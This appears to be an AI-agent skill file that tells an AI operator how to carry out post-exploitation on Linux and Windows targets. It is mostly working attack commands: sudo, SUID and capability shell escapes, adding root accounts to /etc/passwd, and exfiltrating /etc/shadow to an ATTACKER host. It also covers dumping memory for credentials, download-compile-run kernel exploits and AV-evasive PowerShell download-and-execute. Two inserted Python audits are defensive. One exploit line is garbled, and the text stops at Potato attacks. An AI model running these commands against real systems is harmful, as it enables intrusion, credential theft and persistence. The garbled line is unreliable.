post-exploit

By 0x0pointer. Updated 5/13/2026

name: post-exploit
description: |
  Post-exploitation workflow. Covers privilege escalation (Linux SUID/sudo/kernel, Windows UAC/service/token), persistence assessment, local enumeration, credential harvesting, and pivot preparation.

  Structured workflows for Linux and Windows targets using impacket, netexec, john, linpeas/winpeas, and standard Kali tools. Includes kernel exploit reference tables, GTFOBins exploitation chains, Potato attack selection, Docker/container escapes, DLL hijacking, SSH key harvesting, credential recovery from memory, and Windows token manipulation. Chains from /pentester or /credential-audit when access is obtained.
argument-hint: [os=linux|windows] [access=shell|ssh|rdp|winrm] [current-user=username] [depth=quick|standard|thorough]
user-invocable: true

Post-Exploitation Workflow

You are an expert post-exploitation operator. You have initial access to a target system. Your goal: escalate privileges, harvest credentials, enumerate the local environment, assess persistence mechanisms, and prepare for lateral movement — all while documenting findings for the security report.

Request: $ARGUMENTS


CHAIN COMMITMENTS — DECLARE BEFORE STARTING

Read this before executing any workflow phase. Commit to MANDATORY chains before your first tool call.

| Trigger | Chain | Mandatory? | Claude Code | opencode |
|---|---|---|---|---|
| After session(action="complete") | /gh-export | OPTIONAL — user request only | Skill(skill="gh-export") | cat ~/.config/opencode/commands/gh-export.md |
| Shell/RCE access achieved via credentials | /credential-audit | OPTIONAL | Skill(skill="credential-audit") | cat ~/.config/opencode/commands/credential-audit.md |
| Internal network reachable | /network-assess | OPTIONAL | Skill(skill="network-assess") | cat ~/.config/opencode/commands/network-assess.md |
| AD domain detected | /ad-assessment | OPTIONAL | Skill(skill="ad-assessment") | cat ~/.config/opencode/commands/ad-assessment.md |
| Architecture review needed | /threat-modeling | OPTIONAL | Skill(skill="threat-modeling") | cat ~/.config/opencode/commands/threat-modeling.md |

Logging: Before invoking any skill above, call session(action="set_skill", options={"skill":"<name>","reason":"<why>","chained_from":"<this-skill>"}) — this writes the SKILL_CHAIN entry to pentest.log.


Tools Available

| Tool | Use for |
|---|---|
| session(action="start", options={...}) | Define target, scope, depth, and hard limits — always call this first |
| session(action="complete", options={...}) | Mark the scan done and write final notes |
| kali(command=...) | Kali tools: impacket-scripts, netexec, john, smbclient, ldapsearch, enum4linux-ng, and all standard Linux commands |
| http(action="request", ...) | Raw HTTP for web-based post-exploitation (webshells, management interfaces) |
| http(action="save_poc", ...) | Save a confirmed exploit as a raw .http file in pocs/ |
| report(action="finding", data={...}) | Log a confirmed vulnerability with evidence to findings.json |
| report(action="diagram", data={...}) | Save a Mermaid diagram to findings.json |
| report(action="dashboard", data={"port": 7777}) | Serve dashboard.html at localhost:7777 |
| report(action="note", data={...}) | Write a reasoning note or decision to the session log |

ATT&CK Coverage

| Tactic | Techniques | Phase |
|---|---|---|
| Privilege Escalation (TA0004) | T1548.001 Setuid/Setgid, T1548.002 UAC Bypass, T1068 Exploitation for Priv Esc, T1134 Access Token Manipulation | Phase 2 |
| Persistence (TA0003) | T1053 Scheduled Tasks, T1136 Create Account, T1543 System Services, T1547 Boot Autostart | Phase 4 |
| Discovery (TA0007) | T1057 Process, T1083 File/Dir, T1087 Account, T1016 Network Config, T1082 System Info | Phase 1 |
| Credential Access (TA0006) | T1003 OS Credential Dumping, T1552.001 Credentials in Files, T1555 Credentials from Stores, T1552.004 Private Keys | Phase 3 |
| Defense Evasion (TA0005) | T1574.001 DLL Search Order Hijacking, T1574.002 DLL Side-Loading | Phase 2 |

Depth Presets

| Depth | What runs | Default limits |
|---|---|---|
| quick | Manual checks only (id, sudo -l, SUID, whoami /priv, uname -r) + decision tree exploitation + credential search | $0.10 |
| standard | LinPEAS/WinPEAS full enumeration + targeted exploitation + hash extraction + credential harvesting | $0.50 |
| thorough | Standard + kernel exploits + container escapes + token manipulation + persistence audit + pivot prep | unlimited |

Privilege Escalation Decision Tree

Check highest-impact, lowest-effort paths first.

Linux:

1. `id` + `sudo -l`
   +-- NOPASSWD entry? ---------> Sudo Rule Exploitation (Phase 2A)
   +-- wildcard in sudo rule? --> Sudo Wildcard Abuse (Phase 2A)
   +-- env_keep LD_PRELOAD? ----> env_keep Exploitation (Phase 2A)
2. `find / -perm -4000 -type f 2>/dev/null`
   +-- GTFOBins binary? --------> GTFOBins Chains (Phase 2B)
   +-- Custom SUID binary? -----> strings/ltrace analysis
3. `uname -r` — check kernel
   +-- 5.8-5.16? ---------------> DirtyPipe CVE-2022-0847
   +-- < 6.4 with nf_tables? ---> Netfilter CVE-2023-32233
   +-- Ubuntu OverlayFS? -------> GameOver(lay) CVE-2023-2640/32629
4. `getcap -r / 2>/dev/null`
   +-- cap_setuid? --------------> Direct UID change
5. Container checks
   +-- docker.sock? ------------> Docker Socket Abuse (Phase 2D)
   +-- CAP_SYS_ADMIN? ----------> cgroup/mount escape (Phase 2D)
6. `cat /etc/crontab; ls -la /etc/cron*`
   +-- Writable cron script? ---> Replace with reverse shell

Windows:

1. `whoami /priv`
   +-- SeImpersonate? ----------> Potato Attacks (Phase 2C)
   +-- SeDebugPrivilege? -------> LSASS dump / process injection
   +-- SeBackupPrivilege? ------> SAM/SYSTEM/NTDS extraction
   +-- SeRestorePrivilege? -----> DLL overwrite
2. `wmic service get name,pathname | findstr /v system32`
   +-- Unquoted path? ----------> Unquoted service path exploit
   +-- Writable binary dir? ----> Service binary replacement
3. DLL hijacking — writable PATH dir? --> Phase 2E
4. AlwaysInstallElevated = 1? ---------> MSI privesc
5. Medium integrity + auto-elevate? ---> UAC bypass (fodhelper, eventvwr)

Workflow

Before running any tool

If OS or access method not specified, ask:

Target: <target> | OS: <linux/windows> | Access: <shell/ssh/rdp/winrm> | User: <username>
Depth? quick ($0.10 · 15m · 10) | standard ($0.50 · 45m · 25) | thorough (unlimited)
Any specific objectives? (privesc, credentials, pivot)

Phase 0 — Scope & Setup

  1. session(action="start", options={...}) with target, depth, limits
  2. report(action="dashboard", data={"port": 7777})
  3. report(action="note", data={...}) — record OS, access method, current user/privileges
  4. Windows standard+ only — pre-stage WinPEAS in Kali:
kali(command="curl -sL https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe -o /tmp/winPEASx64.exe && ls -la /tmp/winPEASx64.exe")

Phase 1 — Local Enumeration

quick depth — Decision Tree Inputs Only

Collect just enough to walk the Privilege Escalation Decision Tree. No full enumeration.

Linux:

kali(command="ssh user@TARGET 'id && sudo -l 2>&1'")
kali(command="ssh user@TARGET 'find / -perm -4000 -type f 2>/dev/null | head -30'")
kali(command="ssh user@TARGET 'uname -r && cat /etc/os-release 2>/dev/null | head -5'")

Windows:

kali(command="nxc smb TARGET -u USER -p PASS -x 'whoami /priv'")
kali(command="nxc smb TARGET -u USER -p PASS -x 'whoami /all'")

Cross-user lateral movement — before escalating to root, check if you can pivot to another user on the same host who has higher privileges or different access:

  • List all users and their home directories — look for readable scripts, config files, writable logs, shared directories
  • Check what processes other users are running — any script or service that reads from a file you can write to is an injection vector
  • If another user has a script that processes a log file, config file, or queue that you can append to, craft input that exploits how the script parses it (command injection via unsanitized fields, path traversal, etc.)
  • Check sudo -l for the current user — sometimes you can sudo as a non-root user first, then escalate from them

After these, proceed directly to Phase 2 using the decision tree.


standard / thorough depth — PEAS-First Enumeration

Run PEAS first for comprehensive coverage. PEAS replaces ~15 manual enumeration commands with a single tool that checks hundreds of privesc vectors.

Linux — Run LinPEAS

kali(command="ssh user@TARGET 'curl -sL https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh' 2>&1 | head -2000")

If curl is unavailable, transfer via base64 or SCP:

kali(command="curl -sL https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | base64 -w0 > /tmp/lp.b64 && ssh user@TARGET 'cat | base64 -d | sh' < /tmp/lp.b64 2>&1 | head -2000")

Windows — Run WinPEAS

Method 1 — SMB upload (preferred):

kali(command="nxc smb TARGET -u USER -p PASS --put-file /tmp/winPEASx64.exe 'C:\\Users\\Public\\winPEASx64.exe'")
kali(command="nxc smb TARGET -u USER -p PASS -x 'C:\\Users\\Public\\winPEASx64.exe quiet servicesinfo applicationsinfo windowscreds notcolor' 2>&1 | head -2000")

Method 2 — PowerShell download (if SMB fails):

kali(command="nxc smb TARGET -u USER -p PASS -x 'powershell -ep bypass -c \"IWR -Uri https://github.com/peass-ng/PEASS-ng/releases/latest/download/winPEASx64.exe -OutFile C:\\Users\\Public\\wp.exe; C:\\Users\\Public\\wp.exe quiet notcolor\"' 2>&1 | head -2000")

Method 3 — PowerShell script (no binary drop, AV evasion):

kali(command="nxc smb TARGET -u USER -p PASS -x 'powershell -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString(\\\"https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1\\\")\"' 2>&1 | head -2000")

Reading PEAS Output

PEAS produces thousands of lines. Focus on marked/highlighted findings:

LinPEAS key sections:

| Section header | What to look for | Feeds into |
|---|---|---|
| ══╣ Sudo | NOPASSWD entries, env_keep, wildcards | Phase 2A — Sudo exploitation |
| ══╣ SUID | Known GTFOBins binaries, custom SUID | Phase 2B — GTFOBins chains |
| ══╣ Capabilities | cap_setuid, cap_dac_override, cap_sys_admin | Phase 2B — Capability abuse |
| ══╣ Cron | Writable cron scripts, wildcard in cron paths | Decision tree step 6 |
| ══╣ Container | Docker socket, LXC, cgroup writable | Phase 2D — Container escape |
| ══╣ Users Information | docker/lxd/disk/adm group membership | Direct privesc via group |
| ══╣ Interesting Files | .env, config files with passwords, SSH keys | Phase 3 — Credential harvesting |
| ══╣ Network | Listening services, internal connections | Phase 5 — Pivot prep |
| ══╣ Processes | Processes running as root, writable binaries | Service exploitation |

WinPEAS key sections:

| Section header | What to look for | Feeds into |
|---|---|---|
| ════════╣ Token Privileges | SeImpersonate, SeDebug, SeBackup | Phase 2C — Potato/token attacks |
| ════════╣ Services Information | Unquoted paths, writable binary dirs | Service path hijacking |
| ════════╣ Applications Information | Outdated software with known CVEs | Search Exploit-DB for each app + version (see below) |
| ════════╣ Windows Credentials | Saved creds, WiFi, DPAPI, AutoLogon | Phase 3 — Credential harvesting |
| ════════╣ Interesting Files | Config files, .env, web.config | Phase 3 — Credential harvesting |
| ════════╣ Scheduled Tasks | Writable task binaries/scripts | Task hijacking |
| ════════╣ DLL Hijacking | Writable PATH directories | Phase 2E — DLL hijacking |
| ════════╣ Network | Listening ports, connections | Phase 5 — Pivot prep |
| ════════╣ Users | Admin group, logged-in users | Lateral movement targets |

Installed Software → Local Privilege Escalation

For every application and version listed in WinPEAS (or LinPEAS) output, search for local privilege escalation exploits. Third-party software is one of the most common privesc vectors — the application may run as SYSTEM, have writable directories, or have known vulnerabilities:

# List installed software with versions
kali(command="ssh user@TARGET 'dir \"C:\\Program Files\" && dir \"C:\\Program Files (x86)\"'")
# Or on Linux:
kali(command="ssh user@TARGET 'dpkg -l 2>/dev/null || rpm -qa 2>/dev/null' | head -50")

# For each application + version, search Exploit-DB
kali(command="searchsploit paperstream")
kali(command="searchsploit 'application name' privilege escalation local")

If an exploit is found, download and run it — many are PowerShell scripts or require placing a malicious DLL in a writable application directory.

Targeted Follow-Up

Run only if PEAS output was truncated or a section needs deeper inspection:

# Linux — if capabilities section was empty/truncated
kali(command="ssh user@TARGET 'getcap -r / 2>/dev/null'")

# Linux — clean sudo -l for decision tree (if PEAS sudo section unclear)
kali(command="ssh user@TARGET 'sudo -l 2>&1'")

# Linux — full cron detail if PEAS cron section was truncated
kali(command="ssh user@TARGET 'cat /etc/crontab 2>/dev/null && ls -la /etc/cron.d/ /etc/cron.daily/ 2>/dev/null'")

# Windows — clean whoami /priv for Potato selection
kali(command="nxc smb TARGET -u USER -p PASS -x 'whoami /priv'")

After enumeration: report(action="note", data={...}) with PEAS highlights + report(action="diagram", data={...}) with system topology.


Phase 2 — Privilege Escalation

Phase 2A — Sudo Rule Parsing and Exploitation

kali(command="ssh user@TARGET 'sudo -l 2>&1'")

Sudo wildcard abuse (e.g., sudo tar cf /dev/null /var/log/*):

kali(command="ssh user@TARGET 'cd /var/log && echo \"\" > \"--checkpoint=1\" && echo \"\" > \"--checkpoint-action=exec=sh shell.sh\" && echo -e \"#!/bin/bash\ncp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash\" > shell.sh && chmod +x shell.sh'")

env_keep exploitation — if sudo -l shows env_keep += LD_PRELOAD:

kali(command="ssh user@TARGET 'cat > /tmp/evil.c << \"CEOF\"
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void _init() { unsetenv(\"LD_PRELOAD\"); setuid(0); setgid(0); system(\"/bin/bash -p\"); }
CEOF
gcc -fPIC -shared -nostartfiles -o /tmp/evil.so /tmp/evil.c
sudo LD_PRELOAD=/tmp/evil.so <allowed_command>'")

Other exploitable env_keep variables: LD_LIBRARY_PATH (place malicious .so in writable path), PYTHONPATH (place malicious module that sudo Python script imports).
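Added example (not part of the original skill): a hardening audit of `sudo -l` output that flags the same rule classes Phase 2A walks by hand: NOPASSWD entries, wildcards in arguments, the dangerous env_keep variables named above, non-root run-as targets, and bare binaries that allow any arguments. The `sudo -l` output below is a constructed sample.

```python
import re

# env_keep variables named in Phase 2A: each lets the invoking user control
# what the sudo'd program loads or imports.
DANGEROUS_ENV = ("LD_PRELOAD", "LD_LIBRARY_PATH", "PYTHONPATH")

# Binaries from the GTFOBins tables on this page that yield a shell when the
# rule lists no arguments (sudo then accepts any arguments).
SHELL_CAPABLE = {"sh", "bash", "env", "find", "vi", "vim", "less", "more", "man",
                 "python", "python3", "perl", "ruby", "node", "php", "awk", "sed", "tar"}

# "(runas) TAG: TAG: command args" as printed by `sudo -l`
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")
ENV_KEEP_RE = re.compile(r'env_keep\s*\+?=\s*"?([^",]+)"?')

# Constructed sample of `sudo -l` output for user "alice" on host "web01".
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin,
    env_keep+=LD_PRELOAD

User alice may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/tar cf /dev/null /var/log/*
    (root) /usr/bin/vim
    (backup) NOPASSWD: /usr/local/bin/rotate.sh
    (ALL : ALL) SETENV: /usr/bin/python3 /opt/app/run.py
"""


def audit_sudo_l(text):
    """Parse `sudo -l` output; return dangerous env_keep vars and per-rule risks."""
    env_keep, rules = [], []
    for line in text.splitlines():
        m = ENV_KEEP_RE.search(line)
        if m:
            env_keep += [v for v in m.group(1).split() if v in DANGEROUS_ENV]
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()      # "(ALL : ALL)" -> ALL
        tags = re.findall(r"([A-Z]+):", m.group("tags"))
        cmd = m.group("cmd").strip()
        argv = cmd.split()
        risks = []
        if "NOPASSWD" in tags:
            risks.append("NOPASSWD")
        if "SETENV" in tags:
            risks.append("SETENV")                           # caller may override env_reset
        if cmd == "ALL":
            risks.append("unrestricted command")
        elif any(ch in arg for arg in argv[1:] for ch in "*?["):
            risks.append("wildcard in arguments")            # sudo glob-matches the args
        if len(argv) == 1 and argv[0].rsplit("/", 1)[-1] in SHELL_CAPABLE:
            risks.append("shell escape capable")             # no argument list: any args allowed
        if runas not in ("root", "ALL"):
            risks.append(f"runs as non-root user {runas}")   # cross-user pivot (Phase 1)
        rules.append({"runas": runas, "tags": tags, "cmd": cmd, "risks": risks})
    return {"env_keep": env_keep, "rules": rules}


if __name__ == "__main__":
    report = audit_sudo_l(SAMPLE_SUDO_L)
    for var in report["env_keep"]:
        print(f"env_keep exposes {var}: remove it from sudoers")
    for rule in report["rules"]:
        print(f"({rule['runas']}) {rule['cmd']}: {', '.join(rule['risks']) or 'ok'}")
```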

Phase 2B — GTFOBins Exploitation

Step 1 — Dynamic cross-reference

Cross-reference every SUID binary, sudo-allowed binary, and capability binary against the full GTFOBins database:

kali(command="ssh user@TARGET 'find / -perm -4000 -type f 2>/dev/null' > /tmp/suid_bins.txt && curl -s https://gtfobins.github.io/index.json | python3 -c '
import json, sys, os
gtfo = {b[\"name\"]: b.get(\"functions\", []) for b in json.load(sys.stdin)}
with open(\"/tmp/suid_bins.txt\") as f:
    for line in f:
        path = line.strip()
        name = os.path.basename(path)
        if name in gtfo:
            funcs = gtfo[name]
            tags = []
            if any(\"suid\" in str(fn).lower() for fn in funcs): tags.append(\"SUID\")
            if any(\"sudo\" in str(fn).lower() for fn in funcs): tags.append(\"sudo\")
            if any(\"capabilities\" in str(fn).lower() for fn in funcs): tags.append(\"cap\")
            tag = \" \".join(tags or [\"check\"])
            print(f\"MATCH: {path} [{tag}] -> https://gtfobins.github.io/gtfobins/{name}/\")
' 2>/dev/null")

For sudo-allowed binaries:

kali(command="ssh user@TARGET 'sudo -l 2>&1' | grep -oP '\\S+$' | while read bin; do name=$(basename \"$bin\"); curl -sf \"https://gtfobins.github.io/gtfobins/$name/\" > /dev/null && echo \"MATCH: $bin -> https://gtfobins.github.io/gtfobins/$name/\"; done")

For capability binaries:

kali(command="ssh user@TARGET 'getcap -r / 2>/dev/null' | while read line; do bin=$(echo \"$line\" | awk '{print $1}'); name=$(basename \"$bin\"); caps=$(echo \"$line\" | grep -oP 'cap_\\w+'); curl -sf \"https://gtfobins.github.io/gtfobins/$name/\" > /dev/null && echo \"MATCH: $bin [$caps] -> https://gtfobins.github.io/gtfobins/$name/\"; done")

Step 2 — Exploitation reference table

Always check the GTFOBins page for the matched binary — the tables below are common examples, NOT an exhaustive list. GTFOBins is continuously updated with new binaries and techniques. If a binary matched in Step 1 but isn't in these tables, visit the GTFOBins URL from the match output for the exact exploit command.

For each match, use the appropriate exploitation technique. Organized by context:

Sudo NOPASSWD — shell escape / command execution:

Binary Exploit
ash/bash/csh/dash/ksh/sh/zsh sudo <shell>
env sudo env /bin/bash
find sudo find / -name x -exec /bin/bash \;
flock sudo flock -u / /bin/bash
nice sudo nice /bin/bash
stdbuf sudo stdbuf -i0 /bin/bash
timeout sudo timeout --foreground 9999 /bin/bash
xargs sudo xargs -a /dev/null /bin/bash
expect sudo expect -c 'spawn /bin/bash; interact'
script sudo script -c /bin/bash /dev/null
vi/vim sudo vim -c ':!/bin/bash'
less sudo less /etc/shadow then !bash
more sudo more /etc/shadow then !bash
man sudo man man then !bash
ftp sudo ftp then !bash
ssh sudo ssh -o ProxyCommand=';bash 0<&2 1>&2' x
git sudo git help config then !bash
mysql sudo mysql -e '\! /bin/bash'
psql sudo psql -c '\\! /bin/bash'
sqlite3 sudo sqlite3 /dev/null '.shell /bin/bash'
nmap sudo nmap --interactive then !sh (< 5.35); or --script (see below)
perl sudo perl -e 'exec "/bin/bash";'
python/python3 sudo python3 -c 'import os; os.system("/bin/bash")'
ruby sudo ruby -e 'exec "/bin/bash"'
lua sudo lua -e 'os.execute("/bin/bash")'
node sudo node -e 'require("child_process").spawn("/bin/bash",{stdio:[0,1,2]})'
php sudo php -r 'system("/bin/bash");'
awk/gawk/mawk sudo awk 'BEGIN {system("/bin/bash")}'
sed sudo sed -n '1e exec /bin/bash 1>&0' /etc/hosts
ed sudo ed then !/bin/bash
tar sudo tar cf /dev/null f --checkpoint=1 --checkpoint-action=exec=/bin/bash
zip sudo zip /tmp/x.zip /etc/hosts -T --unzip-command="sh -c /bin/bash"
rsync sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
cp sudo cp /bin/bash /tmp/rootbash && sudo chmod +s /tmp/rootbash && /tmp/rootbash -p
mv Overwrite /etc/passwd with modified copy
tee echo 'hacker::0:0::/root:/bin/bash' | sudo tee -a /etc/passwd
dd echo 'hacker::0:0::/root:/bin/bash' | sudo dd of=/etc/passwd oflag=append conv=notrunc
wget sudo wget --post-file=/etc/shadow http://ATTACKER/ (exfil) or overwrite passwd
curl sudo curl file:///etc/shadow -o /tmp/shadow (read) or --upload-file (exfil)
docker sudo docker run -v /:/hostfs --rm alpine chroot /hostfs bash
lxc/lxd Create privileged container with host mount
systemctl sudo systemctl then !bash (pager escape)
journalctl sudo journalctl then !bash (pager escape)
service sudo service ../../tmp/shell (path traversal to script)
doas sudo doas /bin/bash

SUID binary exploitation — run with -p flag to preserve elevated privileges:

Binary Exploit
bash /path/to/bash -p
find /path/to/find . -exec /bin/bash -p \;
env /path/to/env /bin/bash -p
python/python3 /path/to/python3 -c 'import os; os.setuid(0); os.system("/bin/bash -p")'
perl /path/to/perl -e 'exec "/bin/bash -p";'
php /path/to/php -r 'pcntl_exec("/bin/bash",["-p"]);'
node /path/to/node -e 'process.setuid(0); require("child_process").execSync("/bin/bash -p",{stdio:"inherit"})'
vim /path/to/vim -c ':!/bin/bash -p'
nmap echo 'os.execute("/bin/bash -p")' > /tmp/x.nse && /path/to/nmap --script=/tmp/x.nse
cp/mv Copy modified /etc/passwd over original
dd Read /etc/shadow: LFILE=/etc/shadow; /path/to/dd if=$LFILE
tee Write to /etc/passwd: echo 'root2::0:0::/root:/bin/bash' | /path/to/tee -a /etc/passwd
wget Overwrite /etc/passwd: /path/to/wget http://ATTACKER/passwd -O /etc/passwd
ar File read: /path/to/ar r /dev/null /etc/shadow && cat /dev/null
base64 File read: /path/to/base64 /etc/shadow | base64 -d
taskset /path/to/taskset 1 /bin/bash -p
start-stop-daemon /path/to/start-stop-daemon -n x -S -x /bin/bash -- -p
strace /path/to/strace -o /dev/null /bin/bash -p
ltrace /path/to/ltrace -b -L /bin/bash -p
gdb /path/to/gdb -nx -ex 'python import os; os.setuid(0)' -ex '!bash -p' -ex quit

Capability exploitation — when getcap shows capabilities on a binary:

Capability Binary examples Exploit
cap_setuid+ep python, perl, php, node, ruby python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
cap_setuid+ep gdb gdb -nx -ex 'python import os; os.setuid(0)' -ex '!bash' -ex quit
cap_dac_read_search+ep tar tar czf /tmp/shadow.tar.gz /etc/shadow && tar xzf /tmp/shadow.tar.gz
cap_dac_read_search+ep base64 base64 /etc/shadow | base64 -d
cap_dac_override+ep vim, python, perl Write to /etc/passwd or /etc/shadow
cap_sys_admin+ep python Mount host filesystem: python3 -c 'import os; os.system("mount /dev/sda1 /mnt")'
cap_sys_ptrace+ep python, gdb, strace Inject into root process
cap_net_raw+ep tcpdump, python Sniff network traffic

Step 3 — Fallback for unknown binaries

If a SUID/sudo/capability binary is not in the tables above, check GTFOBins directly:

kali(command="curl -sf 'https://gtfobins.github.io/gtfobins/BINARY_NAME/' | grep -oP '(?<=<code>).*?(?=</code>)' | head -20")

Or use http(action="request", ...):

http(action="request", url="https://gtfobins.github.io/gtfobins/BINARY_NAME/", method="GET")

Parse the page for exploitation techniques under the relevant context (SUID, Sudo, Capabilities). Each GTFOBins page lists exploitation commands per context.

If the binary is not on GTFOBins, think about what it can do — not every sudo binary is a shell escape. Some are more valuable for other reasons:

Debugging/memory tools (gcore, gdb, strace, ltrace, perf, valgrind) — if you can sudo these, you can dump the memory of any privileged process. Look for processes running as root that might hold credentials (password managers, key stores, database connectors, web apps with DB passwords in memory):

# Find interesting privileged processes
ps -ef | grep -E "root.*(pass|secret|key|vault|store|db|mysql|postgres)"
# Dump process memory with gcore
sudo gcore PID
# Search the dump for credentials
strings core.PID | grep -iE "password|secret|token|key" | head -20
# Or with gdb
sudo gdb -p PID -batch -ex "gcore /tmp/dump" -ex quit

File manipulation tools (cp, mv, dd, tee, wget, curl) — if you can sudo these, you can read/write privileged files (shadow, passwd, SSH keys, configs).

Package/service tools (apt, pip, systemctl, service) — if you can sudo these, you can install backdoors or restart services with modified configs.

For any unlisted binary, analyze what it does:

kali(command="ssh user@TARGET 'strings /path/to/binary | grep -iE \"system|exec|popen|/bin/\" | head -20'")
kali(command="ssh user@TARGET 'ltrace /path/to/binary 2>&1 | head -30'")
kali(command="ssh user@TARGET 'strace -f /path/to/binary 2>&1 | grep -iE \"exec|open|connect\" | head -30'")

If strings/ltrace reveals the binary calls commands using relative paths (e.g. calls chmod, setuid, service, curl without /usr/bin/ prefix), this is a PATH hijack — one of the most common SUID privesc techniques:

  1. Create a malicious script with the same name as the relative command (e.g. /tmp/setuid containing /bin/sh)
  2. Make it executable
  3. Prepend your directory to PATH: export PATH=/tmp:$PATH
  4. Run the SUID binary — it executes your script with root privileges instead of the real command

Also check if the binary calls system() (which uses PATH) vs execve() (which uses absolute paths) — only system() is vulnerable to PATH hijack.
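Added example (not from the original skill): the strings-then-PATH check described above, written as a reviewable audit. It pulls bare command invocations out of `strings` output, notes whether the binary imports system(), and reports which directories in the inherited PATH are searched before the real binary and are writable. The `strings` output is a constructed sample and the PATH layout is built in a temporary directory; the fix for a binary that fails this audit is absolute paths (or execve with a fixed PATH), as the text above says.

```python
import os
import re
import tempfile

# Commands the page lists as typical relative invocations in SUID helpers,
# plus a few common ones; extend for the binary under review.
KNOWN_COMMANDS = {"chmod", "chown", "setuid", "service", "curl", "wget",
                  "systemctl", "cp", "mv", "cat", "id", "sh", "bash"}
CMD_LINE_RE = re.compile(r"^(?P<cmd>[A-Za-z][\w.-]*)(?:\s|$)")

# Constructed `strings` output for a hypothetical SUID maintenance helper.
SAMPLE_STRINGS = """\
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
Starting maintenance
service apache2 restart
chmod 600 /var/lib/app/state
/usr/bin/logger -t app done
GLIBC_2.2.5
"""


def relative_commands(strings_output):
    """Lines that look like shell commands run by bare name (PATH-resolved)."""
    found = []
    for line in strings_output.splitlines():
        line = line.strip()
        if not line or line.startswith("/"):            # absolute path: not PATH-resolved
            continue
        m = CMD_LINE_RE.match(line)
        if m and m.group("cmd") in KNOWN_COMMANDS:
            found.append((m.group("cmd"), line))
    return found


def calls_system(strings_output):
    """system() goes through /bin/sh and PATH; execve() of an absolute path does not."""
    return "system" in strings_output.splitlines()


def resolve_in_path(cmd, path_env):
    """Mimic sh/execvp lookup: first PATH entry holding an executable `cmd`."""
    for d in path_env.split(os.pathsep):
        candidate = os.path.join(d or ".", cmd)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def hijackable(cmd, path_env):
    """Directories a caller could plant `cmd` in ahead of the real one, or the
    real file itself if it is writable. An empty list means PATH is safe for cmd."""
    real = resolve_in_path(cmd, path_env)
    plantable = []
    for d in path_env.split(os.pathsep):
        d = d or "."
        if real is not None and os.path.join(d, cmd) == real:
            if os.access(real, os.W_OK):
                plantable.append(real)
            break                                        # later entries never win
        if os.path.isdir(d) and os.access(d, os.W_OK):
            plantable.append(d)
    return {"command": cmd, "resolves_to": real, "plantable": plantable}


def audit_suid_binary(strings_output, path_env):
    """Combine the three checks into one report for the binary under review."""
    return {
        "calls_system": calls_system(strings_output),
        "commands": [dict(hijackable(cmd, path_env), line=line)
                     for cmd, line in relative_commands(strings_output)],
    }


def build_demo_path():
    """Constructed PATH: a writable dir first, then a dir holding a stand-in
    chmod, then one more dir. Returns (path_env, writable_dir, real_chmod)."""
    base = tempfile.mkdtemp(prefix="pathaudit-")
    writable, bindir, after = (os.path.join(base, n) for n in ("w", "bin", "after"))
    for d in (writable, bindir, after):
        os.mkdir(d)
    real = os.path.join(bindir, "chmod")
    with open(real, "w") as f:
        f.write("#!/bin/sh\nexit 0\n")                   # stand-in for the real tool
    os.chmod(real, 0o755)
    return os.pathsep.join((writable, bindir, after)), writable, real


if __name__ == "__main__":
    path_env, _, _ = build_demo_path()
    rep = audit_suid_binary(SAMPLE_STRINGS, path_env)
    print("imports system():", rep["calls_system"])
    for c in rep["commands"]:
        print(f"{c['line']!r}: resolves to {c['resolves_to']}, plantable in {c['plantable']}")
```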

Linux Kernel Exploit Reference Table

Only attempt when simpler methods fail. Pre-check: uname -r && gcc --version && which curl wget

Always search dynamically first — new kernel CVEs are published constantly. These examples show the pattern, not an exhaustive list:

kali(command="searchsploit linux kernel $(ssh user@TARGET 'uname -r | cut -d- -f1')")
kali(command="searchsploit privilege escalation linux $(ssh user@TARGET 'uname -r | cut -d. -f1,2')")

Well-known examples (to demonstrate the download → compile → run pattern):

CVE Name Affected Kernels Exploit
CVE-2022-0847 DirtyPipe 5.8 - 5.16.11, 5.15.25, 5.10.102 curl -sL https://raw.githubusercontent.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit/main/exploit.c -o /tmp/dp.c && gcc /tmp/dp.c -o /tmp/dp && /tmp/dp /etc/passwd 1 ...
CVE-2016-5195 DirtyCow 2.6.22 - 4.8.3 curl -sL https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c -o /tmp/dc.c && gcc -pthread /tmp/dc.c -o /tmp/dc -lcrypt && /tmp/dc newpassword
CVE-2021-4034 PwnKit polkit < 0.120 (pre-Jan 2022) curl -sL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o /tmp/PwnKit && chmod +x /tmp/PwnKit && /tmp/PwnKit
CVE-2023-32233 Netfilter 5.1 - 6.4 (nf_tables + user ns) git clone https://github.com/Liuk3r/CVE-2023-32233 /tmp/nf && cd /tmp/nf && make && ./exploit
CVE-2023-0386 OverlayFS 5.11 - 6.2 (user ns + FUSE) git clone https://github.com/xkaneiki/CVE-2023-0386 /tmp/ovl && cd /tmp/ovl && make all && ./fuse ./ovlcap/lower ./gc &
CVE-2023-2640/32629 GameOver(lay) Ubuntu 20.04/22.04/22.10/23.04 unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p]??teleay l/ && setcap cap_setuid+eip l/... && mount -t overlay ..."

Phase 2C — Windows Privilege Escalation

Potato Attacks

Use when whoami /priv shows SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.

Always search for the latest Potato variants — new ones are published regularly. Search dynamically first:

kali(command="searchsploit potato privilege escalation windows")
